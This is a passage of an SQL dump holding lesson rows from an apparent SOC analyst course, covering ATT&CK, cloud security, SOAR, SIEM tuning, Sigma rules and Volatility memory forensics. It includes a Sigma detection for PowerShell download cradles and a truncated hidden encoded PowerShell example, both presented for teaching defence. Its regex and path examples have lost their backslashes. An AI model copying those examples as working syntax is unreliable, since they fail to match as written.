(636, 315, '## Using ATT&CK for Defense\n\nHow do we actually use this in the SOC?\n\n### 1. Alert Enrichment\nWhen an alert fires in the SIEM, tag it with the T-Code.\n*   Bad: \"Alert: PowerShell detected.\"\n*   Good: \"Alert: **T1059.001** PowerShell Execution detected.\"\n*   Why? This allows you to run metrics later. \"We saw 500 T1059 alerts this month.\"\n\n### 2. Gap Analysis\n*   \"We have 50 SIEM rules.\"\n*   Map them to ATT&CK.\n*   \"Oh, wait. 49 of them are for **Malware** (Execution), and 1 is for **Phishing**. We have ZERO rules for **Exfiltration**.\"\n*   Action: Write rules for Exfiltration.\n\n### 3. Adversary Emulation (Red Teaming)\n*   Instead of just \"pentesting\" (finding random bugs), tell the Red Team: \"Emulate **Fin7**.\"\n*   The Red Team will look up Fin7\'s ATT&CK profile and use *only* those techniques.\n*   This tests if your SOC can catch that specific threat actor.\n\n### The Pyramid of Pain Connection\nMITRE ATT&CK focuses on TTPs (The top of the pyramid). If you defend against Techniques (e.g., \"Block all unsigned usage of PowerShell\"), you stop *every* attacker who uses PowerShell, not just one specific script.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(637, 316, '## Module 31 Review\nYou have completed the Core SOC Skills.\n*   You know the workflow (IR).\n*   You know the tools (SIEM, EDR, IDS).\n*   You know the map (ATT&CK).\n\nNext: Cloud Security and Automation (The future of SOC).', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 14:20:29'),
(638, 321, '## Cloud Service Models: Who manages what?\n\nTo secure the cloud, you must understand the \"Pizza-as-a-Service\" analogies.\n\n### 1. On-Premises (Traditional IT)\n*   **Concept**: You own everything. The building, the AC, the servers, the cables, the OS, the App.\n*   **Pizza**: You buy flour, cheese, an oven, gas, and make the pizza at home.\n*   **Security**: You are responsible for 100% of the stack.\n\n### 2. IaaS (Infrastructure as a Service)\n*   **Concept**: You rent the hardware (VMs). Amazon manages the data center and the hypervisor. You manage the OS and up.\n*   **Pizza**: You buy a frozen pizza (App) and bake it in a rented oven (Infrastructure).\n*   **Examples**: AWS EC2, Azure VM, Google Compute Engine.\n*   **Security**: You must patch Windows/Linux. Amazon secures the physical building.\n\n### 3. PaaS (Platform as a Service)\n*   **Concept**: You just bring your code. The provider manages the Hardware AND the OS.\n*   **Pizza**: You order pizza delivery.\n*   **Examples**: AWS Lambda, Azure SQL Database, Google App Engine, Heroku.\n*   **Security**: You secure your *Code* and *Identity*. You cannot patch the OS (AWS does it).\n\n### 4. SaaS (Software as a Service)\n*   **Concept**: You just use the software.\n*   **Pizza**: You go to a restaurant.\n*   **Examples**: Gmail, Salesforce, Dropbox, Slack.\n*   **Security**: You only manage **Access** (Who can log in?) and **Data** (What files do we upload?).\n\n### Why this matters for the SOC?\nIf you get an alert for a SaaS app (Salesforce), checking the \"CPU usage\" is impossible. You have no server access. You can only check \"Login Logs\".\nIf you get an alert for IaaS (EC2), you *can* check CPU usage and likely have Shell access.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(639, 322, '## The Shared Responsibility Model\n\nThis is the most critical concept in Cloud Security. It answers: **\"If we get hacked, whose fault is it?\"**\n\n### The Line in the Sand\n*   **Cloud Provider (AWS/Azure)**: Responsible for security **OF** the Cloud.\n    *   Physical security (Guards, Fences).\n    *   Power/Cooling.\n    *   Hypervisor vulnerabilities.\n    *   Network cabling.\n*   **Customer (You)**: Responsible for security **IN** the Cloud.\n    *   Your Data.\n    *   Your User Accounts (IAM).\n    *   Your OS Patches (for IaaS).\n    *   Your Firewall Rules (Security Groups).\n\n### The \"S3 Bucket\" Scenario\n*   **Scenario**: A company leaves an S3 bucket (storage folder) \"Public\". Hackers steal 1 million customer records.\n*   **Who is at fault?** The Customer.\n*   **Why?** AWS gave you the tools to make it private. You chose (or forgot) to make it public. AWS secured the hard drive so no one could steal the physical disk, but they cannot stop you from publishing your own data.\n\n### The Variance\nThe line moves based on the service model.\n*   **IaaS**: You do more work (Patching, Antivirus).\n*   **SaaS**: You do less work (Just Identity/Data).\n\n### SOC Implications\nIn the cloud, **Identity is the new Perimeter**.\n*   In On-Prem, we trusted people inside the firewall.\n*   In Cloud, there is no firewall around the API. If an attacker steals an API Key or Admin Password, they *are* the Admin.\n*   Therefore, **MFA (Multi-Factor Authentication)** is the single most important control in the cloud.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(640, 323, '## AWS Security Fundamentals\n\nSince AWS is the biggest player, let\'s look at its core security services. (Azure/GCP have equivalents).\n\n### 1. IAM (Identity and Access Management)\nThe gatekeeper.\n*   **Users**: People (Bob).\n*   **Roles**: Hats that people/machines wear.\n    *   *Best Practice*: Don\'t give an EC2 instance a password. Give it a **Role** allowing access to S3.\n*   **Policies**: JSON documents defining rules.\n    *   `Effect: Allow`, `Action: s3:GetObject`, `Resource: my-bucket/*`.\n*   **Principle of Least Privilege**: Give only the permissions needed. Nothing more.\n\n### 2. CloudTrail (The Black Box)\n*   **What**: Logs EVERY API call made in the account.\n*   **Example**: \"User \'Alice\' called \'TerminateInstance\' on server i-12345 at 2 PM from IP 1.2.3.4\".\n*   **SOC Use**: This is your primary log source for investigation.\n\n### 3. GuardDuty (The IDS)\n*   **What**: Threat Detection service.\n*   **How**: Analyzes CloudTrail, VPC Flow Logs (Network), and DNS logs using ML.\n*   **Alerts**: \"EC2 instance is mining Bitcoin\", \"API Key used from Tor Node\".\n\n### 4. Security Groups (The Firewall)\n*   **What**: Stateful firewall for EC2 instances.\n*   **Rules**: \"Allow Port 80 from Anywhere\". \"Allow Port 22 from Office IP only\".\n*   **Common Mistake**: `0.0.0.0/0` on Port 22 (SSH Open to the world = Hacked in 5 minutes).\n\n### 5. VPC (Virtual Private Cloud)\n*   Your isolated network slice of the cloud.\n*   **Public Subnet**: Can talk to Internet.\n*   **Private Subnet**: Only talks internally (Database).\n*   **NACL**: Stateless firewall at the subnet level.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(641, 324, '## Azure Security Fundamentals\n\nMicrosoft Azure is massive in the corporate world. It is tightly integrated with Active Directory.\n\n### 1. Entra ID (Formerly Azure AD)\nThis is NOT just Active Directory in the cloud. It is a completely different identity system using OIDC/SAML protocols.\n*   **Conditional Access**: \"If user is Admin AND location is China -> Block.\"\n*   **PIM (Privileged Identity Management)**: \"Just-in-Time\" admin access. You aren\'t Admin 24/7. You request admin access for 1 hour to fix a server, then it expires.\n\n### 2. Azure Sentinel (The SIEM)\nCloud-native SIEM. (Covered in Module 22).\n\n### 3. Defender for Cloud (ASC)\n*   **CSPM (Cloud Security Posture Management)**: Scans your account for bad configs.\n    *   \"Hey, you have an SQL Database with no encryption.\"\n    *   \"Hey, you have `0.0.0.0` on your VM.\"\n*   **Secure Score**: Gamifies security. \"Your score is 45%. Turn on MFA to get +10 points.\"\n\n### 4. NSG (Network Security Group)\nThe equivalent of AWS Security Groups. Content firewall rules.\n\n### 5. Log Analytics Workspace\nThe central bucket where all logs (VMs, Firewalls, Entra ID) are dumped for querying (using KQL).', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 16:11:17'),
(642, 325, '## Cloud Misconfigurations\n\nAttacking the cloud is rarely about \"Zero Day Exploits\". It is about finding **Misconfigurations**.\nAccording to Gartner, 99% of cloud breaches are the customer\'s fault.\n\n### Top Misconfigurations\n1.  **Public Storage Buckets**: S3 buckets set to \"Public Read\".\n2.  **Over-Permissive IAM**: Giving a user `AdministratorAccess` instead of just `S3ReadOnly`.\n3.  **Open Security Groups**: Allowing SSH (Port 22) from `0.0.0.0/0` (The whole internet).\n4.  **Disabled Logging**: Turning off CloudTrail. (Now you have no evidence).\n5.  **Exposed Keys**: Hardcoding AWS Access Keys in GitHub code.\n\n### CSPM (Cloud Security Posture Management)\nTools like **Wiz**, **Prisma Cloud**, or **AWS Security Hub** that scan for these mistakes automatically.', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 14:21:21'),
(643, 326, '## Module 32 Review\nCloud Security is about Identity and Configuration.\n*   **IaaS/PaaS/SaaS** dictates what you own.\n*   **Shared Responsibility**: You verify the lock; Provider verifies the door.\n*   **Misconfigurations** are the #1 enemy.\n\nNext: Automating the boring stuff (SOAR).', 'markdown', 15, '2025-12-26 23:10:39', '2025-12-29 14:21:21'),
(644, 331, '## Why Automate Security?\n\nThe SOC is drowning.\n*   **Alert Volume**: 10,000 alerts/day.\n*   **Staff**: 5 Analysts.\n*   **Math**: Impossible.\n\n### The Solution: SOAR (Security Orchestration, Automation, and Response)\nSOAR tools replace manual, repetitive clicks with code.\n\n### Benefits\n1.  **Speed**: A human takes 20 minutes to block an IP on 10 firewalls. A script takes 1 second.\n2.  **Consistency**: Humans make typos. Scripts do exactly what they are told.\n3.  **Morale**: No analyst wants to spend 8 hours resetting passwords. Automate the boring stuff so analysts can hunt.\n\n### The \"O\" in Orchestration\nConnecting different tools.\n*   \"Take the IP from Splunk.\"\n*   \"Check it in VirusTotal.\"\n*   \"Send a Slack message.\"\n*   \"Add to Palo Alto firewall.\"\nThese tools don\'t talk to each other natively. SOAR is the glue (API Connector).\n\n### Risks of Automation\n**Automating a bad process just breaks things faster.**\n*   *Bad Rule*: \"Block any IP that fails login 5 times.\"\n*   *Scenario*: CEO forgets password.\n*   *Automation*: Blocks the entire office NAT IP.\n*   *Result*: Fireable offense.\n*   *Fix*: Always have a \"Human in the Loop\" for destructive actions until you are 100% sure.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:17'),
(645, 332, '## SOAR Platforms Overview\n\n### 1. Palo Alto XSOAR (Demisto)\nThe market leader.\n*   Uses a drag-and-drop playbook editor.\n*   Thousands of integrations.\n*   \"War Room\" feature where chat and commands are mixed.\n\n### 2. Splunk SOAR (Phantom)\n*   Tightly integrated with Splunk.\n*   Python-centric.\n\n### 3. Tines\n*   The modern, lightweight challenger.\n*   No-code. Looks like a flowchart. Very popular because it is easy to learn.\n\n### 4. Microsoft Logic Apps / Sentinel\n*   If you use Sentinel, you create \"Playbooks\" using Logic Apps.\n*   Very cheap and powerful for Azure environments.\n\n### The Workflow of a Playbook\n1.  **Trigger**: New Alert from SIEM.\n2.  **Enrichment**:\n    *   Query threat intel (VirusTotal).\n    *   Query LDAP (Get user\'s manager).\n3.  **Decision (Condition)**:\n    *   Is it Malicious? (VirusTotal > 5/70).\n4.  **Action**:\n    *   If Yes -> Isolate Host.\n    *   If No -> Close Ticket as False Positive.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:17'),
(646, 333, '## Playbook Design\n\nA **Playbook** is the coded logic of a Standard Operating Procedure (SOP).\n\n### Common Logic Blocks\n1.  **Trigger**: New Phishing Alert.\n2.  **Action**: Extract URL.\n3.  **Enrichment**: Check URL reputation (VirusTotal).\n4.  **Decision (Software)**:\n    *   If VT Score > 5: **BLOCK** and Close Ticket.\n    *   If VT Score < 5: Ask Analyst to review.\n\n### Human-in-the-Loop\nYou don\'t automate *everything*. \nCritical decisions (e.g., \"Shut down the CEO\'s laptop\") should prompt a human for \"Yes/No\" approval via Slack/Email.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 14:21:21'),
(647, 334, '## Common Automation Use Cases\n\nWhere should you start automating?\n\n### 1. Phishing Triage (The #1 Time sink)\n*   **Manual**: Analyst opens email, extracts URL, checks URLScan.io, checks sender IP... (15 mins).\n*   **Automated**: User forwards email to `phish@company.com`. SOAR extracts artifacts, scans them, and only alerts the analyst if it finds a malicious link. (0 mins human time for clean emails).\n\n### 2. Malware Containment\n*   **Trigger**: EDR detects Ransomware.\n*   **Action**: Automatically isolate the host via API call to EDR.\n*   **Why**: Speed is critical. If you wait 20 minutes for a human to see the ticket, the whole network is encrypted.\n\n### 3. User Onboarding/Offboarding\n*   **Trigger**: HR system says \"Bob is fired\".\n*   **Action**: Disable Active Directory account, revoke VPN, wipe mobile device.\n\n### 4. Threat Intel Management\n*   **Trigger**: New IOC list from CISA.\n*   **Action**: Push IPs to firewall blocklist automatically.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:17'),
(648, 335, '## Python for Security Automation\n\nYou don\'t need to be a Developer, but you must know how to Script. **Python** is the language of Security.\n\n### Why Python?\n*   **Libraries**: `requests` (HTTP), `pandas` (Data), `boto3` (AWS).\n*   **Readability**: Easy to read code.\n*   **APIs**: Almost every security tool has a REST API, and Python is great at talking to APIs.\n\n### Key Concepts for SOC\n1.  **JSON Parsing**: Every API returns JSON. You need to know how to dig into dictionaries within lists. `data[\'alerts\'][0][\'source_ip\']`.\n2.  **Requests**: `response = requests.get(url, headers=api_key)`.\n3.  **Regex**: Extracting IPs from text blobs.\n\n### Example Script Idea\n*   Input: `suspicious_ips.txt`.\n*   Loop: For each IP...\n*   Action: Check AbuseIPDB API.\n*   Logic: If confidence > 90...\n*   Output: Write to `firewall_blocklist.csv`.\n\n**Lab Tip**: In this module\'s lab, you will write a simple script to parse a log file. Do not fear the code; it is just logic written in text.', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 16:11:18'),
(649, 336, '## Module 33 Review\nAutomation is a force multiplier.\n*   **SOAR**: The platform for automation.\n*   **Playbooks**: The logic charts.\n*   **Outcome**: Faster response, happier analysts.\n\nNext: The final skill - Communication (Reporting).', 'markdown', 15, '2025-12-26 23:11:57', '2025-12-29 14:21:21'),
(650, 341, '## Why Documentation Matters\n\nIf you didn\'t document it, it didn\'t happen.\nIn a legal case, your notes are evidence.\n\n### Who reads your report?\n1.  **Other Analysts**: \"Has this happened before?\"\n2.  **Your Boss**: \"Is the team busy? Do we need more budget?\"\n3.  **The Auditors**: \"Did you follow the process?\"\n4.  **The Lawyers**: \"Did we exercise due diligence?\"\n\n### Types of Documentation\n*   **Ticket Notes**: Rough, real-time notes inside the case.\n*   **Incident Reports**: Formal summary after the fact.\n*   **Runbooks/SOPs**: Instructions on *how* to do things.\n*   **Change Logs**: Records of system modifications.\n\n### The Bus Factor\nIf you are the only one who knows how the firewall works, and you get hit by a bus (or win the lottery), the company fails. Documentation increases the \"Bus Factor\".', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 16:11:18'),
(651, 342, '## Incident Timelines\n\nThe most critical part of an Incident Report.\n\n### Precision is Key\n*   **Bad**: \"The hacker got in around noon.\"\n*   **Good**: \"12:01:45 PM UTC - Attacker IP 1.2.3.4 successfully authenticated.\"\n\n### UTC vs Local Time\n**ALWAYS USE UTC**.\n*   Attacker is in Russia (+3).\n*   Server is in AWS (+0).\n*   Analyst is in New York (-5).\n*   Management is in California (-8).\nUsing local time creates a disaster. Standardize on UTC.', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(652, 343, '## Writing Effective Reports\n\n### Know Your Audience\n1.  **Technical Audience (CTO, Engineers)**:\n    *   Wants: IP addresses, Hashes, root cause, exact commands used.\n    *   Tone: Precise, technical.\n2.  **Executive Audience (CEO, Board)**:\n    *   Wants: Risk level, Financial impact, \"Is it fixed?\", \"How do we prevent it?\"\n    *   Tone: High-level, money-focused. **No jargon**.\n    *   *Bad*: \"The APT used a Heap Spray exploit.\"\n    *   *Good*: \"Sophisticated attackers compromised a web server.\"\n\n### The 5 W\'s\n*   **Who** (Attacker/Victim)?\n*   **What** (Happened)?\n*   **When** (Timeline)?\n*   **Where** (Systems)?\n*   **Why** (Motive)?', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(653, 344, '## Effective Report Writing: The Executive Summary\n\nThe most important part of any report is the first page. Executives will **only** read the first page.\n\n### The BLUF (Bottom Line Up Front)\nStart with the conclusion.\n*   **Bad**: \"On Monday we saw a log. Then we looked at it. It was weird...\"\n*   **Good**: \"We prevented a Ransomware attack on the Finance Server. No data was lost. 1 laptop is currently being reimaged.\"\n\n### Key Elements of Exec Summary\n1.  **What happened?** (High level).\n2.  **What was the impact?** (Data lost? Money lost? Downtime?).\n3.  **What did we do?** (Fixed it?).\n4.  **What is the risk now?** (Safe? Controlled?).\n5.  **What do we need?** (Approval to buy x?).\n\n### Language\nAvoid jargon.\n*   *No*: \"The APT initiated a C2 beacon via DNS tunneling.\"\n*   *Yes*: \"The attacker established a hidden connection to control our server.\"\nSpeak in \"Business Risk\", not \"Technobabble\".', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 16:11:18'),
(654, 345, '## Metrics and KPIs\n\nHow do we measure the SOC\'s performance?\n\n### MTTD (Mean Time To Detect)\n*   How long does the attacker stay hidden?\n*   *Goal*: Minimize this. (World average is ~20 days. Goal is <1 hour).\n\n### MTTR (Mean Time To Respond/Remediate)\n*   Once detected, how fast do we fix it?\n*   *Goal*: Minimize this.\n\n### False Positive Rate\n*   Are we burning out analysts with bad alerts?\n\n### Dwell Time\n*   Total time the adversary had access.\n\nGood metrics drive budget. \"Our MTTD dropped 50% since we bought Tool X.\"', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(655, 346, '## Module 34 Review\nYou have completed the entire Path 3: SOC Analyst Level 1.\n\n### Journey Recap\n1.  **SIEM/EDR/IDS**: The tools.\n2.  **Malware/IR**: The threats and response.\n3.  **Network/Hunting**: The deeper analysis.\n4.  **Cloud/Automation**: The modern environment.\n5.  **Reporting**: The professional output.\n\nCongratulations! You are now ready for the Path 3 Certification Exam.', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(656, 361, '## SIEM Architecture Deep Dive\n\nWelcome to the big leagues. In Path 3, we treated the SIEM as a black box that just \"works\". In Advanced SOC roles, you need to know *how* it works, because you will be the one fixing it when it breaks.\n\n### The Pipeline of Data\nA typical Enterprise SIEM (like Splunk or ELK) has a distributed architecture.\n\n1.  **Generation**: The endpoint (Windows) or device (Firewall) creates the log.\n2.  **Collection (The Edge)**:\n    *   **Universal Forwarder (Splunk) / Beats (Elastic)**: Small agents on the endpoint.\n    *   **Syslog Server**: A Linux box acting as a funnel for network devices.\n    *   *Bottleneck Risk*: If the Syslog server disk fills up, you lose firewall logs instantly.\n3.  **Aggregation (The Middleman)**:\n    *   **Heavy Forwarder (Splunk) / Logstash**: Intermediate servers that parse, filter, and mask data (e.g., removing Credit Card numbers) *before* sending it to the core.\n    *   *Why?* To save bandwidth and CPU on the main indexers.\n4.  **Indexing (The Core)**:\n    *   **Indexers**: The heavy lifters. They write the data to disk.\n    *   *Clustering*: Data is replicated across multiple indexers for High Availability.\n5.  **Search Head (The User Interface)**:\n    *   This is what you log into. It doesn\'t store data. It distributes your query to the Indexers, merges the results, and shows you the graph.\n\n### Hot, Warm, Cold Buckets\nStorage is expensive. We can\'t keep petabytes on SSDs.\n*   **Hot Bucket**: Data arriving *right now*. Stored on NVMe SSDs for instant search. (Retained: ~7 days).\n*   **Warm Bucket**: Data from last week. Read-only. Stored on SSDs. (Retained: ~30 days).\n*   **Cold Bucket**: Data from last month. Moved to cheaper HDDs. Slower to search. (Retained: ~1 year).\n*   **Frozen**: Data archived to Amazon S3 Glacier (Tape). Unsearchable unless you \"thaw\" it. (Retained: 5-7 years for legal).\n\n### EPS (Events Per Second) Sizing\n*   **Scenario**: A firewall sends 10,000 logs/second.\n*   **Math**: 10k EPS * 500 bytes/log = 5 MB/second = 432 GB/day.\n*   **Impact**: Can your Indexer write 5 MB/s continuously while *also* answering search queries? If not, you need more hardware.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(657, 362, '## Log Parsing & Normalization: The Regex Dojo\n\nYou cannot be a Senior Analyst without knowing Regex (Regular Expressions). When standard parsers fail, you must write your own.\n\n### The Problem: Unstructured Data\nA developer writes a custom app that logs errors like this:\n`[ERROR] User:bob | IP:10.0.0.1 | Msg:Login Failed`\n\nYour SIEM doesn\'t know what \"User:bob\" means. You need to extract \"bob\" into the `user` field.\n\n### Regex Basics\n*   `d`: Any digit (0-9).\n*   `w`: Any word character (a-z, 0-9, _).\n*   `s`: Whitespace.\n*   `+`: One or more.\n*   `*`: Zero or more.\n*   `?`: Optional.\n*   `( )`: Capture group (The part you want to extract).\n\n### Example Extraction\nLog: `[ERROR] User:bob | IP:10.0.0.1`\n\n**Bad Regex**: `User:.* |`\n*   Why? `.*` is greedy. It matches everything until the end. Precise matching is efficient.\n\n**Good Regex**: `User:(w+)s|sIP:(d{1,3}.d{1,3}.d{1,3}.d{1,3})`\n*   Group 1 (`w+`) matches \"bob\".\n*   Group 2 matches the IP.\n\n### Splunk Field Extraction (props.conf / transforms.conf)\nIn Splunk, you define these in config files.\n*   `[my_custom_app]`\n*   `EXTRACT-user = User:(w+)`\n\n### Field Aliasing (CIM Compliance)\n*   Your app logs it as `client_ip`.\n*   Splunk CIM expects `src`.\n*   **Alias**: `FIELDALIAS-c_ip = client_ip AS src`\n*   Now, a search for `src=10.0.0.1` will find your logs automatically.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(658, 363, '## Advanced Correlation: Risk-Based Alerting (RBA)\n\nTraditional correlation (\"3 failed logins = Alert\") generates too much noise. **RBA** is the modern approach managed by Advanced SOCs.\n\n### The Concept\nInstead of triggering an alert *immediately*, we assign **Risk Points** to an entity (User or System).\n\n*   **Rule 1**: User triggered \"Possible Phishing Link\". (Confidence: Low).\n    *   Current Logic: Alert Analyst -> False Positive 90%.\n    *   RBA Logic: Add **+10 Risk Points** to User. (No Alert).\n*   **Rule 2**: User triggered \"Unusual PowerShell\". (Confidence: Medium).\n    *   RBA Logic: Add **+30 Risk Points** to User.\n*   **Rule 3**: User triggered \"Data Upload to Personal Cloud\". (Confidence: Low).\n    *   RBA Logic: Add **+20 Risk Points** to User.\n\n### The Threshold Alert\n*   **Total Risk Score**: 10 + 30 + 20 = **60**.\n*   **Threshold Rule**: \"Alert when Risk Score > 50\".\n*   **Result**: The analyst gets ONE high-fidelity alert (\"User with Risk 60\") that tells the whole story, instead of 3 low-fidelity alerts.\n\n### Implementing Kill Chains\nAdvanced correlation tracks the sequence.\n`transaction` command in Splunk loops events together by ID.\n*   If `Event A` (Firewall Permit) AND `Event B` (IDS SQL Injection) occur within 10 seconds...\n*   Combine them into a generic \"Exploit Attempt\" meta-event.\n\n### Statistical Anomaly Detection (Standard Deviation)\n*   Calculate the average daily outbound traffic for `Payroll_Server` over 30 days (`avg=50MB`, `stdev=10MB`).\n*   **Rule**: Alert if Today > `avg + (3 * stdev)`.\n*   (If today represents 80MB, that\'s 3 sigmas away—statistically extremely rare).\n*   *Advantage*: You don\'t need to know the *exact* number; the math finds the outlier for you.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(659, 364, '## Query Optimization: Speed is Survival\n\nIn a crisis, waiting 15 minutes for a search to complete is unacceptable. You must write efficient queries.\n\n### 1. The \"Left-to-Right\" Rule (Pipeline Processing)\nMost SIEMs process data in a pipeline. You want to filter the massive dataset **as early as possible** (on the left side).\n\n*   **Bad Splunk Query**:\n    `index=main | regex \"password\" | where status=200`\n    *   Why? The index contains 1 Billion events. It pulls ALL of them, runs a heavy Regex on ALL of them, and *then* checks status.\n*   **Good Splunk Query**:\n    `index=main status=200 \"password\"`\n    *   Why? It effectively uses the \"index\" to only retrieve events that already have `status=200` and the string \"password\". It might retrieve only 100 events.\n\n### 2. Avoid \"Leading Wildcards\"\n*   `index=main user=*bob`\n*   Why is this bad? The database is indexed alphabetically.\n    *   `abc`\n    *   `bob`\n    *   `zack`\n    *   If you search `bob*`, it jumps to \"B\" instantly.\n    *   If you search `*bob`, it must scan `abc`, `bob`, `zack`... literally every single word in the dictionary to see if it ends in \"bob\". It destroys CPU.\n\n### 3. Specify Time Ranges\n*   Never search \"All Time\".\n*   Always narrow down to \"Last 60 minutes\" or \"Specific Date Window\".\n\n### 4. Fast Mode vs. Verbose Mode\n*   **Fast Mode**: Returns only field summary/statistics. (Super fast).\n*   **Verbose Mode**: Returns every raw event text. (Slow).\n*   If you just need a count (`stats count`), use Fast Mode.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(660, 365, '## Building Detection-as-Code (DaC)\n\nThe old way: Click \"Create Rule\" in the GUI. Type stuff. Save.\nThe new way: Rules are logic. Logic is Code.\n\n### Why Code?\n1.  **Version Control (Git)**:\n    *   \"Who changed the Ransomware rule yesterday?\" -> Check Git Commit History.\n    *   \"The new rule broke the SIEM.\" -> `git revert`.\n2.  **Testing (CI/CD)**:\n    *   Before deploying a rule to Production, run it in a pipeline against a test dataset.\n    *   \"Does this rule trigger on this sample `malware.evtx`?\" (Unit Test).\n\n### Sigma: The Standard Format\n**Sigma** is a generic signature format for SIEMs (like Snort is for IDS). It is written in YAML.\n\n```yaml\ntitle: Suspicious PowerShell Download\nstatus: experimental\nlogsource:\n    product: windows\n    service: powershell\ndetection:\n    selection:\n        EventID: 4104\n        ScriptBlockText|contains:\n            - \'Net.WebClient\'\n            - \'DownloadString\'\n    condition: selection\nlevel: high\n```\n\n### The Workflow\n1.  Analyst writes triggers in Sigma (YAML).\n2.  Commits to GitHub.\n3.  **Sigmac** (Compiler) converts the YAML into:\n    *   Splunk SPL (`index=windows EventID=4104 ...`)\n    *   Elastic Query (Lucene)\n    *   Azure Sentinel (KQL)\n4.  Automation pushes the query to the SIEM API.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(661, 366, '## Module 36 Review\nAdvanced SIEM is Engineering.\n*   **Architecture**: How data flows.\n*   **RBA**: Reducing noise by scoring.\n*   **Optimization**: Writing fast queries.\n*   **DaC**: Managing rules via Git.\n\nNext: Digging into RAM with Memory Forensics.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 14:22:44'),
(662, 371, '## Why Memory Forensics?\n\nDisk Forensics is great, but it has limits.\n*   **Encryption**: If the disk is BitLocker encrypted and the computer is off, the data is gone.\n*   **Fileless Malware**: Some malware lives *only* in RAM. It never touches the hard drive. If you pull the plug, the evidence vanishes.\n*   **Rootkits**: Kernel-level rootkits can lie to the OS, but they cannot hide from memory analysis (mostly).\n\n### What lives in RAM?\nEverything the computer is thinking about *right now*.\n1.  **Running Processes** (and their injected DLLs).\n2.  **Network Connections** (Active sockets).\n3.  **Command History** (cmd.exe / powershell.exe buffers).\n4.  **Passwords/Keys**:\n    *   BitLocker keys.\n    *   Mimikatz output.\n    *   User passwords (sometimes in cleartext if poorly coded apps are running).\n5.  **Clipboard Contents**: What did the user just Copy/Paste?\n\n### The Principle of Exchange\nRAM is extremely volatile. Every second the computer is on, thousands of pages of memory are being overwritten. Speed is essential.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(663, 372, '## Memory Acquisition Techniques\n\nTaking a \"picture\" of RAM is trickier than disk.\n\n### 1. Hardware-Based Acquisition (DMA)\n*   **FireWire / Thunderbolt**: These ports have Direct Memory Access (DMA).\n*   **Method**: Plug in a specialized device. It can read RAM directly without the CPU even knowing.\n*   **Pros**: Undetectable by malware.\n*   **Cons**: Requires physical ports; modern OS protections (DMA Mapping) often block this.\n\n### 2. Software-Based Acquisition (Kernel Driver)\n*   **Method**: Run a tool (Administrator privileges required) that loads a Kernel Driver to read physical memory.\n*   **Tools**:\n    *   **WinPMEM**: Part of the Rekall framework.\n    *   **DumpIt**: Simple, one-click dumper.\n    *   **FTK Imager**: GUI-based.\n*   **Risk**: Loading a driver *changes* the memory you are trying to measure (Heisenberg Uncertainty Principle). It might trigger a Blue Screen of Death (BSOD) if the system is unstable.\n\n### 3. Virtual Machine Snapshots\n*   If the target is a VM (VMware/Hyper-V), you are lucky.\n*   **Method**: Just take a Snapshot \"with memory\".\n*   **File**: `.vmem` file. This is a perfect, uncorrupted copy of the RAM. No tools needed on the guest.\n\n### The Hyberfil.sys file\n*   When a laptop hibernates (sleeps), Windows writes the entire contents of RAM to `C:hiberfil.sys`.\n*   **Forensic Gold**: You can convert this file into a raw memory image and analyze it, even if the computer is currently off.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(664, 373, '## Volatility Framework Deep Dive\n\n**Volatility** is the industry-standard (Command Line) tool for analyzing memory dumps. It supports Windows, Linux, and Mac.\n\n### The Profile (Volatility 2 vs 3)\n*   **Volatility 2**: Required you to specify the \"Profile\" manually (e.g., `Win10x64_1909`). If you got it wrong, it output garbage.\n*   **Volatility 3**: Modern version. It detects the OS automatically using Symbol Tables.\n\n### Essential Commands (Plugins)\nAssuming you have a distinct memory image `mem.dmp`:\n\n1.  **pslist / psscan**: List processes.\n    *   `pslist`: Walks the \"Active Process Head\" (What Windows *admits* is running).\n    *   `psscan`: Scans raw memory bytes for EPROCESS structures. (Finds \"Hidden\" processes that unlinked themselves from the list).\n    *   *Comparison*: If a PID shows up in `psscan` but NOT `pslist`, it is a **Rootkit**.\n2.  **netscan**: List network connections.\n    *   Shows Protocol, Local IP, Remote IP, State (ESTABLISHED), and PID.\n    *   \"Why is `notepad.exe` connected to Russia on Port 4444?\"\n3.  **malfind**: Detects code injection.\n    *   It looks for memory pages that are:\n        *   Executable (RWX permissions).\n        *   Start with `MZ` header (Executable file) OR generic Shellcode patterns.\n    *   Output: Hex dump of the injection.\n4.  **dlllist**: List loaded DLLs for a process.\n    *   \"Why does `svchost.exe` have `cryptominer.dll` loaded?\"\n5.  **cmdline**: Shows the command line arguments.\n    *   `powershell.exe -w hidden -enc JABz...` (Base64 encoded evil script).\n\n### Workflow\n1.  Identify rogue networking (`netscan`). -> Found PID 1234.\n2.  Investigate process (`pslist`). -> PID 1234 is `svchost.exe`.\n3.  Check parent (`pstree`). -> Parent is `explorer.exe`. (BAD. `svchost` should come from `services.exe`).\n4.  Check injection 